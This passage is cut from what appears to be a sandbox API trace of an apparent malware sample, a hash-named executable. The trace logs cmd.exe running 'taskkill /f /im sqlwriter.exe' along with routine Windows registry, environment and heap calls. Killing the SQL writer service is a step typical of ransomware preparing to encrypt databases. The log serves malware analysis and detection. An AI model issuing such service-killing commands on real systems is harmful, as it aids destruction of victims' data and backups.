bInheritHandle=0, dwThreadId=0x12c4) returned 0x78 [0151.801] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0151.801] GetProcAddress (hModule=0x75600000, lpProcName="SetThreadUILanguage") returned 0x75642510 [0151.801] SetThreadUILanguage (LangId=0x0) returned 0x409 [0151.854] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0151.854] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0151.854] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.854] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0151.854] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0151.854] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0151.854] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0151.854] GetConsoleOutputCP () returned 0x1b5 [0151.859] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0151.859] SetConsoleCtrlHandler (HandlerRoutine=0xf30e40, Add=1) returned 1 [0151.859] _get_osfhandle (_FileHandle=1) returned 0x13c [0151.859] SetConsoleMode (hConsoleHandle=0x13c, dwMode=0x0) returned 0 [0151.859] _get_osfhandle (_FileHandle=1) returned 0x13c [0151.859] GetConsoleMode (in: hConsoleHandle=0x13c, lpMode=0xf3f40c | out: lpMode=0xf3f40c) returned 0 [0151.859] _get_osfhandle (_FileHandle=0) returned 0x130 [0151.859] GetConsoleMode (in: hConsoleHandle=0x130, lpMode=0xf3f408 | out: lpMode=0xf3f408) returned 0 [0151.859] GetEnvironmentStringsW () returned 0x697cc0* [0151.860] GetProcessHeap () returned 0x690000 [0151.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x6986e8 [0151.860] FreeEnvironmentStringsA (penv="A") returned 1 [0151.860] GetProcessHeap () returned 0x690000 [0151.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4) returned 0x690550 [0151.860] GetEnvironmentStringsW () returned 0x697cc0* [0151.860] GetProcessHeap () returned 0x690000 [0151.860] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa1a) returned 0x699110 [0151.860] FreeEnvironmentStringsA (penv="A") returned 1 [0151.860] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.861] RegCloseKey (hKey=0x88) returned 0x0 [0151.861] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x88) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.861] RegQueryValueExW (in: hKey=0x88, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.862] RegQueryValueExW (in: hKey=0x88, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0151.862] RegQueryValueExW (in: hKey=0x88, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0151.862] RegCloseKey (hKey=0x88) returned 0x0 [0151.862] time (in: timer=0x0 | out: timer=0x0) returned 0x62344206 [0151.862] srand (_Seed=0x62344206) [0151.862] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlwriter.exe \"" [0151.862] GetCommandLineW () returned="cmd.exe /c \"taskkill /f /im sqlwriter.exe \"" [0151.862] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0151.862] GetProcessHeap () returned 0x690000 [0151.862] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x210) returned 0x699b38 [0151.862] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x699b40, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0151.862] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x63 [0151.862] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0151.863] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.863] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0151.863] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0151.863] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0151.863] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0151.863] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0151.863] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0151.863] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0151.863] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0151.863] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0151.864] GetProcessHeap () returned 0x690000 [0151.864] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6986e8) returned 1 [0151.864] GetEnvironmentStringsW () returned 0x697cc0* [0151.864] GetProcessHeap () returned 0x690000 [0151.864] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa32) returned 0x69a790 [0151.865] FreeEnvironmentStringsA (penv="A") returned 1 [0151.865] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0151.865] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0151.865] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0151.865] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0151.865] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0151.865] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0151.865] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0151.865] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0151.865] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0151.865] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0151.865] GetProcessHeap () returned 0x690000 [0151.865] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x44) returned 0x6905c8 [0151.865] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0151.865] GetFullPathNameW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFilePart=0x19fc4c*="Desktop") returned 0x1d [0151.866] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0151.866] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0x3ce179de, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3ce179de, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x690618 [0151.866] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0151.866] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x84ac775d, ftLastAccessTime.dwHighDateTime=0x1d70074, ftLastWriteTime.dwLowDateTime=0x84ac775d, ftLastWriteTime.dwHighDateTime=0x1d70074, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RDhJ0CNFevzX", cAlternateFileName="RDHJ0C~1")) returned 0x690618 [0151.866] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0151.866] _wcsnicmp (_String1="RDHJ0C~1", _String2="RDhJ0CNFevzX", _MaxCount=0xc) returned 16 [0151.866] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x8d4a6a0d, ftLastAccessTime.dwHighDateTime=0x1d83aa1, ftLastWriteTime.dwLowDateTime=0x8d4a6a0d, ftLastWriteTime.dwHighDateTime=0x1d83aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x690618 [0151.867] FindClose (in: hFindFile=0x690618 | out: hFindFile=0x690618) returned 1 [0151.867] GetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 0x11 [0151.867] SetCurrentDirectoryW (lpPathName="C:\\Users\\RDhJ0CNFevzX\\Desktop" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop")) returned 1 [0151.867] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 1 [0151.867] GetProcessHeap () returned 0x690000 [0151.868] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69a790) returned 1 [0151.868] GetEnvironmentStringsW () returned 0x697cc0* [0151.868] GetProcessHeap () returned 0x690000 [0151.868] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xa76) returned 0x699d50 [0151.868] FreeEnvironmentStringsA (penv="=") returned 1 [0151.868] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xf47720 | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop") returned 0x1d [0151.869] GetProcessHeap () returned 0x690000 [0151.869] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6905c8) returned 1 [0151.869] GetProcessHeap () returned 0x690000 [0151.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400e) returned 0x69bc50 [0151.870] GetProcessHeap () returned 0x690000 [0151.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4e) returned 0x69a7d0 [0151.870] GetProcessHeap () returned 0x690000 [0151.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x69fc68 [0151.870] GetProcessHeap () returned 0x690000 [0151.870] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x4008) returned 0x6a3c78 [0151.871] _wcsnicmp (_String1="task", _String2="cmd ", _MaxCount=0x4) returned 17 [0151.872] GetProcessHeap () returned 0x690000 [0151.872] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x418) returned 0x69a828 [0151.872] SetErrorMode (uMode=0x0) returned 0x8003 [0151.872] SetErrorMode (uMode=0x1) returned 0x0 [0151.872] GetFullPathNameW (in: lpFileName="taskkill \\f \\.", nBufferLength=0x208, lpBuffer=0x69a830, lpFilePart=0x19fbac | out: lpBuffer="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f", lpFilePart=0x19fbac*="f") returned 0x29 [0151.872] SetErrorMode (uMode=0x8003) returned 0x1 [0151.872] GetProcessHeap () returned 0x690000 [0151.873] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a828, Size=0x80) returned 0x69a828 [0151.873] GetProcessHeap () returned 0x690000 [0151.873] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a828) returned 0x80 [0151.873] NeedCurrentDirectoryForExePathW (ExeName="taskkill \\f \\.") returned 1 [0151.873] GetProcessHeap () returned 0x690000 [0151.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x62) returned 0x69a8b0 [0151.873] GetProcessHeap () returned 0x690000 [0151.873] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xb8) returned 0x69a920 [0151.873] GetProcessHeap () returned 0x690000 [0151.873] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a920, Size=0x62) returned 0x69a920 [0151.873] GetProcessHeap () returned 0x690000 [0151.873] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a920) returned 0x62 [0151.873] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xf3f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0151.874] GetProcessHeap () returned 0x690000 [0151.874] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0xe0) returned 0x69a990 [0151.881] GetProcessHeap () returned 0x690000 [0151.881] RtlReAllocateHeap (Heap=0x690000, Flags=0x0, Ptr=0x69a990, Size=0x76) returned 0x69a990 [0151.881] GetProcessHeap () returned 0x690000 [0151.881] RtlSizeHeap (HeapHandle=0x690000, Flags=0x0, MemoryPointer=0x69a990) returned 0x76 [0151.881] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0151.882] FindFirstFileExW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\Desktop\\taskkill \\f\\im sqlwriter.exe ", fInfoLevelId=0x1, lpFindFileData=0x19f958, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x19f958) returned 0xffffffff [0151.882] GetLastError () returned 0x3 [0151.882] GetProcessHeap () returned 0x690000 [0151.883] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69fc68) returned 1 [0151.883] GetProcessHeap () returned 0x690000 [0151.883] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x6a3c78) returned 1 [0151.884] GetProcessHeap () returned 0x690000 [0151.884] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bc50) returned 1 [0151.884] GetConsoleOutputCP () returned 0x1b5 [0151.887] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xf3f460 | out: lpCPInfo=0xf3f460) returned 1 [0151.887] GetUserDefaultLCID () returned 0x409 [0151.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xf434a0, cchData=8 | out: lpLCData=":") returned 2 [0151.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0151.887] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xf434b0, cchData=8 | out: lpLCData="/") returned 2 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xf43500, cchData=32 | out: lpLCData="Mon") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xf43540, cchData=32 | out: lpLCData="Tue") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xf43580, cchData=32 | out: lpLCData="Wed") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xf435c0, cchData=32 | out: lpLCData="Thu") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xf43600, cchData=32 | out: lpLCData="Fri") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xf43640, cchData=32 | out: lpLCData="Sat") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xf43680, cchData=32 | out: lpLCData="Sun") returned 4 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xf434c0, cchData=8 | out: lpLCData=".") returned 2 [0151.888] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xf434e0, cchData=8 | out: lpLCData=",") returned 2 [0151.888] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0151.890] GetProcessHeap () returned 0x690000 [0151.890] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20c) returned 0x69aa58 [0151.890] GetConsoleTitleW (in: lpConsoleTitle=0x69aa58, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0151.895] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75600000 [0151.895] GetProcAddress (hModule=0x75600000, lpProcName="CopyFileExW") returned 0x7561ffc0 [0151.895] GetProcAddress (hModule=0x75600000, lpProcName="IsDebuggerPresent") returned 0x7561b0b0 [0151.895] GetProcAddress (hModule=0x75600000, lpProcName="SetConsoleInputExeNameW") returned 0x7559b440 [0151.896] GetProcessHeap () returned 0x690000 [0151.896] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x400a) returned 0x69bc50 [0151.896] GetProcessHeap () returned 0x690000 [0151.896] RtlFreeHeap (HeapHandle=0x690000, Flags=0x0, BaseAddress=0x69bc50) returned 1 [0151.898] _wcsicmp (_String1="taskkill", _String2=")") returned 75 [0151.898] _wcsicmp (_String1="FOR", _String2="taskkill") returned -14 [0151.899] _wcsicmp (_String1="FOR/?", _String2="taskkill") returned -14 [0151.899] _wcsicmp (_String1="IF", _String2="taskkill") returned -11 [0151.899] _wcsicmp (_String1="IF/?", _String2="taskkill") returned -11 [0151.899] _wcsicmp (_String1="REM", _String2="taskkill") returned -2 [0151.899] _wcsicmp (_String1="REM/?", _String2="taskkill") returned -2 [0151.899] GetProcessHeap () returned 0x690000 [0151.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x58) returned 0x69ac70 [0151.899] GetProcessHeap () returned 0x690000 [0151.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x1a) returned 0x690578 [0151.900] GetProcessHeap () returned 0x690000 [0151.900] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x8, Size=0x36) returned 0x69acd0 [0151.901] GetConsoleTitleW (in: lpConsoleTitle=0x19fa70, nSize=0x104 | out: lpConsoleTitle="C:\\Users\\RDhJ0CNFevzX\\Desktop\\ec7bae245d61cb7f7a9fa51f487a22e006109d628645f31b880fc72ac58f8027.exe") returned 0x62 [0151.904] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0151.904] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0151.904] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0151.904] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0151.904] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0151.904] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0151.904] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0151.904] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0151.904] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0151.904] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0151.904] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0151.904] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0151.904] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0151.904] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0151.904] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0151.904] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0151.904] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0151.904] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0151.904] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0151.904] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0151.904] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0151.904] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0151.905] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0151.905] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0151.905] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0151.905] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0151.905] _wcsicmp (_String1="taskkill", _String2="VOL") returned -2 [0151.905] _wcsicmp (_String1="taskkill", _String2="EXIT") returned 15 [0151.905] _wcsicmp (_String1="taskkill", _String2="SETLOCAL") returned 1 [0151.905] _wcsicmp (_String1="taskkill", _String2="ENDLOCAL") returned 15 [0151.905] _wcsicmp (_String1="taskkill", _String2="TITLE") returned -8 [0151.905] _wcsicmp (_String1="taskkill", _String2="START") returned 1 [0151.905] _wcsicmp (_String1="taskkill", _String2="DPATH") returned 16 [0151.905] _wcsicmp (_String1="taskkill", _String2="KEYS") returned 9 [0151.905] _wcsicmp (_String1="taskkill", _String2="MOVE") returned 7 [0151.905] _wcsicmp (_String1="taskkill", _String2="PUSHD") returned 4 [0151.905] _wcsicmp (_String1="taskkill", _String2="POPD") returned 4 [0151.905] _wcsicmp (_String1="taskkill", _String2="ASSOC") returned 19 [0151.905] _wcsicmp (_String1="taskkill", _String2="FTYPE") returned 14 [0151.905] _wcsicmp (_String1="taskkill", _String2="BREAK") returned 18 [0151.905] _wcsicmp (_String1="taskkill", _String2="COLOR") returned 17 [0151.905] _wcsicmp (_String1="taskkill", _String2="MKLINK") returned 7 [0151.906] _wcsicmp (_String1="taskkill", _String2="DIR") returned 16 [0151.906] _wcsicmp (_String1="taskkill", _String2="ERASE") returned 15 [0151.906] _wcsicmp (_String1="taskkill", _String2="DEL") returned 16 [0151.906] _wcsicmp (_String1="taskkill", _String2="TYPE") returned -24 [0151.906] _wcsicmp (_String1="taskkill", _String2="COPY") returned 17 [0151.906] _wcsicmp (_String1="taskkill", _String2="CD") returned 17 [0151.906] _wcsicmp (_String1="taskkill", _String2="CHDIR") returned 17 [0151.906] _wcsicmp (_String1="taskkill", _String2="RENAME") returned 2 [0151.906] _wcsicmp (_String1="taskkill", _String2="REN") returned 2 [0151.906] _wcsicmp (_String1="taskkill", _String2="ECHO") returned 15 [0151.906] _wcsicmp (_String1="taskkill", _String2="SET") returned 1 [0151.906] _wcsicmp (_String1="taskkill", _String2="PAUSE") returned 4 [0151.906] _wcsicmp (_String1="taskkill", _String2="DATE") returned 16 [0151.906] _wcsicmp (_String1="taskkill", _String2="TIME") returned -8 [0151.906] _wcsicmp (_String1="taskkill", _String2="PROMPT") returned 4 [0151.906] _wcsicmp (_String1="taskkill", _String2="MD") returned 7 [0151.906] _wcsicmp (_String1="taskkill", _String2="MKDIR") returned 7 [0151.906] _wcsicmp (_String1="taskkill", _String2="RD") returned 2 [0151.906] _wcsicmp (_String1="taskkill", _String2="RMDIR") returned 2 [0151.906] _wcsicmp (_String1="taskkill", _String2="PATH") returned 4 [0151.906] _wcsicmp (_String1="taskkill", _String2="GOTO") returned 13 [0151.906] _wcsicmp (_String1="taskkill", _String2="SHIFT") returned 1 [0151.906] _wcsicmp (_String1="taskkill", _String2="CLS") returned 17 [0151.906] _wcsicmp (_String1="taskkill", _String2="CALL") returned 17 [0151.907] _wcsicmp (_String1="taskkill", _String2="VERIFY") returned -2 [0151.907] _wcsicmp (_String1="taskkill", _String2="VER") returned -2 [0151.907] _wcsicmp (_String1="taskkill", _String2="VOL") 